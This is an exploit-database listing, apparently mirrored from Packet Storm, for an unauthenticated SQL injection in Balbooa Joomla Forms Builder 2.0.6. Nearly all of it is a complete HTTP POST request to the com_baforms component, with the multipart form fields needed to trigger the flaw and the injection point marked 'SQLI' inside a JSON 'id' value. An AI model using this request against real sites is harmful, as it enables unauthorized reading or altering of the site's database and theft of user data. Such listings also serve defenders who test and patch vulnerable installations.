Exploit for Balbooa Joomla Forms Builder 2.0.6 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:164610
# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)  
# Date: 24.10.2021  
# Exploit Author: blockomat2100  
# Vendor Homepage: https://www.balbooa.com/  
# Version: 2.0.6  
# Tested on: Docker  
  
An example request to trigger the SQL-Injection:  
  
POST /index.php?option=com_baforms HTTP/1.1  
Host: localhost  
Content-Length: 862  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035  
Connection: close  
  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="1"  
  
{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="form-id"  
  
1  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="task"  
  
form.message  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="submit-btn"  
  
2  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-title"  
  
Home  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-url"  
  
http://localhost/  
------WebKitFormBoundaryTAak6w3vHUykgInT  
Content-Disposition: form-data; name="page-id"  
  
0  
------WebKitFormBoundaryTAak6w3vHUykgInT--